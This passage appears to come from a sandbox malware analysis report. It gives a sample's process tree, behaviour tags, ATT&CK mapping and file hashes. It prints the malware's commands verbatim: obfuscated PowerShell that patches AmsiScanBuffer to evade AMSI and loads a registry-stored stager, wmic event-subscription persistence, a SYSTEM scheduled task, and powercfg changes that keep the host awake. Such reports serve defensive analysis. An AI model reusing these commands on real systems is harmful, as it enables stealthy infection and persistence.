to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3788 wrote to memory of 3392 3788 powershell.EXE 106 PID 3392 wrote to memory of 612 3392 dllhost.exe 5 PID 3392 wrote to memory of 672 3392 dllhost.exe 7 PID 3392 wrote to memory of 948 3392 dllhost.exe 12 PID 3392 wrote to memory of 336 3392 dllhost.exe 13 PID 3392 wrote to memory of 392 3392 dllhost.exe 14 PID 3392 wrote to memory of 868 3392 dllhost.exe 15 PID 3392 wrote to memory of 1092 3392 dllhost.exe 17 PID 3392 wrote to memory of 1108 3392 dllhost.exe 18 PID 3392 wrote to memory of 1152 3392 dllhost.exe 19 PID 3392 wrote to memory of 1216 3392 dllhost.exe 20 PID 3392 wrote to memory of 1292 3392 dllhost.exe 21 PID 3392 wrote to memory of 1300 3392 dllhost.exe 22 PID 3392 wrote to memory of 1368 3392 dllhost.exe 23 PID 3392 wrote to memory of 1408 3392 dllhost.exe 24 PID 3392 wrote to memory of 1452 3392 dllhost.exe 25 PID 3392 wrote to memory of 1556 3392 dllhost.exe 26 PID 3392 wrote to memory of 1564 3392 dllhost.exe 27 PID 3392 wrote to memory of 1600 3392 dllhost.exe 28 PID 3392 wrote to memory of 1720 3392 dllhost.exe 29 PID 3392 wrote to memory of 1752 3392 dllhost.exe 30 PID 3392 wrote to memory of 1764 3392 dllhost.exe 31 PID 3392 wrote to memory of 1836 3392 dllhost.exe 32 PID 3392 wrote to memory of 1888 3392 dllhost.exe 33 PID 3392 wrote to memory of 1900 3392 dllhost.exe 34 PID 3392 wrote to memory of 1972 3392 dllhost.exe 35 PID 3392 wrote to memory of 1996 3392 dllhost.exe 36 PID 3392 wrote to memory of 1436 3392 dllhost.exe 37 PID 3392 wrote to memory of 2092 3392 dllhost.exe 39 PID 3392 wrote to memory of 2228 3392 dllhost.exe 40 PID 3392 wrote to memory of 2276 3392 dllhost.exe 41 PID 3392 wrote to memory of 2436 3392 dllhost.exe 42 PID 3392 wrote to memory of 2444 3392 dllhost.exe 43 PID 3392 wrote to memory of 2664 3392 dllhost.exe 45 PID 3392 wrote to memory of 2680 3392 dllhost.exe 46 PID 3392 wrote to memory of 2748 3392 dllhost.exe 47 PID 3392 wrote to memory of 2804 3392 dllhost.exe 48 PID 3392 wrote to memory of 2816 3392 dllhost.exe 49 PID 3392 wrote to memory of 2840 3392 dllhost.exe 50 PID 3392 wrote to memory of 2848 3392 dllhost.exe 51 PID 3392 wrote to memory of 3056 3392 dllhost.exe 52 PID 3392 wrote to memory of 2304 3392 dllhost.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ef938a33-604c-43cf-a9b8-69c8fd7c208d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{d287e81d-81fd-4328-a560-d010f6877f73}2⤵PID:2272
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{d287e81d-81fd-4328-a560-d010f6877f73}2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in Windows directory
PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1216 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XCIqxNgcXDnB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vsEATYOHQCteei,[Parameter(Position=1)][Type]$SNnuiyBjaE)$SsWDoNrjzMO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$SsWDoNrjzMO.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vsEATYOHQCteei).SetImplementationFlags('Runtime,Managed');$SsWDoNrjzMO.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$SNnuiyBjaE,$vsEATYOHQCteei).SetImplementationFlags('Runtime,Managed');Write-Output $SsWDoNrjzMO.CreateType();}$OqWxejJekyyFk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$zKwesMOngdYrGp=$OqWxejJekyyFk.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cTFGLmhcXukpefvieeN=XCIqxNgcXDnB @([String])([IntPtr]);$kyvhsNkSwYCOgQFcwrnwpC=XCIqxNgcXDnB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UdaRKFyKqwV=$OqWxejJekyyFk.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ybrRMnVgiNoRfn=$zKwesMOngdYrGp.Invoke($Null,@([Object]$UdaRKFyKqwV,[Object]('Load'+'LibraryA')));$rOgHbqDRoDrlwrXNl=$zKwesMOngdYrGp.Invoke($Null,@([Object]$UdaRKFyKqwV,[Object]('Vir'+'tual'+'Pro'+'tect')));$YlWkHFe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ybrRMnVgiNoRfn,$cTFGLmhcXukpefvieeN).Invoke('a'+'m'+'si.dll');$wYpXyKtHqseFGuvuH=$zKwesMOngdYrGp.Invoke($Null,@([Object]$YlWkHFe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$TfsjsqjfMY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rOgHbqDRoDrlwrXNl,$kyvhsNkSwYCOgQFcwrnwpC).Invoke($wYpXyKtHqseFGuvuH,[uint32]8,4,[ref]$TfsjsqjfMY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wYpXyKtHqseFGuvuH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rOgHbqDRoDrlwrXNl,$kyvhsNkSwYCOgQFcwrnwpC).Invoke($wYpXyKtHqseFGuvuH,[uint32]8,0x20,[ref]$TfsjsqjfMY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$ahlfyuafstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:EjpOJMZdENSM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WelrUFPkzoflsg,[Parameter(Position=1)][Type]$ZoJkESqPhm)$FSyFNcvFIlO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$FSyFNcvFIlO.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$WelrUFPkzoflsg).SetImplementationFlags('Runtime,Managed');$FSyFNcvFIlO.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZoJkESqPhm,$WelrUFPkzoflsg).SetImplementationFlags('Runtime,Managed');Write-Output $FSyFNcvFIlO.CreateType();}$KTcFDvkOpxVdu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$pNHtQOebRlPXuf=$KTcFDvkOpxVdu.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dOEBLpThljCPFudzUXr=EjpOJMZdENSM @([String])([IntPtr]);$WusoKCbXqJlAjuRjMaCXaE=EjpOJMZdENSM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DBrayAdaISL=$KTcFDvkOpxVdu.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ZFFlWvKknmMBSH=$pNHtQOebRlPXuf.Invoke($Null,@([Object]$DBrayAdaISL,[Object]('Load'+'LibraryA')));$gjZGQOyAjHRpQXRCe=$pNHtQOebRlPXuf.Invoke($Null,@([Object]$DBrayAdaISL,[Object]('Vir'+'tual'+'Pro'+'tect')));$KZJpYxH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZFFlWvKknmMBSH,$dOEBLpThljCPFudzUXr).Invoke('a'+'m'+'si.dll');$XwdJxxPsjJwyQGFhy=$pNHtQOebRlPXuf.Invoke($Null,@([Object]$KZJpYxH,[Object]('Ams'+'iSc'+'an'+'Buffer')));$bquFwIUvYs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gjZGQOyAjHRpQXRCe,$WusoKCbXqJlAjuRjMaCXaE).Invoke($XwdJxxPsjJwyQGFhy,[uint32]8,4,[ref]$bquFwIUvYs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$XwdJxxPsjJwyQGFhy,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gjZGQOyAjHRpQXRCe,$WusoKCbXqJlAjuRjMaCXaE).Invoke($XwdJxxPsjJwyQGFhy,[uint32]8,0x20,[ref]$bquFwIUvYs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$ahlfyuafstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1956
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1452
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1888
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1900
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1996
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2748
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2304
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3312
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe"C:\Users\Admin\AppData\Local\Temp\34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe"2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start c:\windows\fonts\macunp\rldencj.exe3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 54⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1172
-
-
\??\c:\windows\fonts\macunp\rldencj.exec:\windows\fonts\macunp\rldencj.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2188
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3580
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3772
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:3680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4772
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3948
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:3560
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2672
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3888
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4828
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2592
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 1c23c757702ca071ff590344d30b947c UTLU8ckn0kCXVWfb6VHO8Q.0.1.0.0.01⤵
- Sets service image path in registry
PID:1332 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3624
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3856
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4364
-
\??\c:\windows\fonts\macunp\rldencj.exec:\windows\fonts\macunp\rldencj.exe1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\TEMP\uhfcegjo\awwlau.exeC:\Windows\TEMP\uhfcegjo\awwlau.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4524
-
-
C:\Windows\SysWOW64\cmd.execmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="iyuenudy" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="dceecevu" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='iyuenudy'" DELETE2⤵
- System Location Discovery: System Language Discovery
PID:4532 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:3488
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="iyuenudy" DELETE3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="dceecevu" DELETE3⤵
- System Location Discovery: System Language Discovery
PID:2456
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='iyuenudy'" DELETE3⤵
- System Location Discovery: System Language Discovery
PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="iyuenudy", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="dceecevu",CommandLineTemplate="c:\windows\ime\bhlvrjq\djfica.exe" & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="iyuenudy"", Consumer="CommandLineEventConsumer.Name="dceecevu""2⤵
- System Location Discovery: System Language Discovery
PID:2364 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1080
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="iyuenudy", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="dceecevu",CommandLineTemplate="c:\windows\ime\bhlvrjq\djfica.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2992
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="iyuenudy"", Consumer="CommandLineEventConsumer.Name="dceecevu""3⤵
- System Location Discovery: System Language Discovery
PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks /DELETE /TN qynqcidr /F2⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
PID:2900 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /TN qynqcidr /F3⤵
- System Location Discovery: System Language Discovery
PID:100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 30 /tn "qynqcidr" /ru system /tr "c:\windows\ime\bhlvrjq\djfica.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1696 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 30 /tn "qynqcidr" /ru system /tr "c:\windows\ime\bhlvrjq\djfica.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cmd /c powercfg -import c:\windows\fonts\macunp\BestPower.pow2⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:4432
-
-
C:\Windows\SysWOW64\cmd.execmd /c powercfg -import c:\windows\fonts\macunp\BestPower.pow3⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:2756 -
C:\Windows\SysWOW64\powercfg.exepowercfg -import c:\windows\fonts\macunp\BestPower.pow4⤵
- Power Settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cmd /c powercfg -setactive 26a01be1-b0d4-47ed-ab53-6358b0b052222⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:1588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:540
-
-
C:\Windows\SysWOW64\cmd.execmd /c powercfg -setactive 26a01be1-b0d4-47ed-ab53-6358b0b052223⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:920 -
C:\Windows\SysWOW64\powercfg.exepowercfg -setactive 26a01be1-b0d4-47ed-ab53-6358b0b052224⤵
- Power Settings
PID:1036
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powercfg -h off2⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:1364 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:388
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg -h off3⤵
- Power Settings
- System Location Discovery: System Language Discovery
PID:4944
-
-
-
\??\c:\windows\fonts\mfbdumnc\rdepgb.exec:\windows\fonts\mfbdumnc\rdepgb.exe2⤵PID:2708
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1780
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:720
-
\??\c:\windows\ime\bhlvrjq\djfica.exec:\windows\ime\bhlvrjq\djfica.exe2⤵PID:4484
-
-
\??\c:\windows\ime\bhlvrjq\djfica.exec:\windows\ime\bhlvrjq\djfica.exe2⤵PID:5092
-
-
\??\c:\windows\ime\bhlvrjq\djfica.exec:\windows\ime\bhlvrjq\djfica.exe2⤵PID:1932
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:1516
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Image File Execution Options Injection
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Image File Execution Options Injection
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.2MB
MD54a1bcc6c50e75d6b4cc33b4c3e0caba0
SHA16391543b7a7907737bcb3c42ebaad59e7dd41db0
SHA2562d3a1214f01c3f82c54aa7646b934da11e0cdf20e68e4ac20d3e1156f6dddc6d
SHA5127d7ede8e09eddc89034a1e15da6e25fe45f60672ef3ab8e32866cd7544d371521cefdbc5fcdc1d079dd27ead726cd8f44b38ecaee62e612a9f415b0ddef404e7
-
Filesize
1.4MB
MD556debec02d064b74ace28f47912518cf
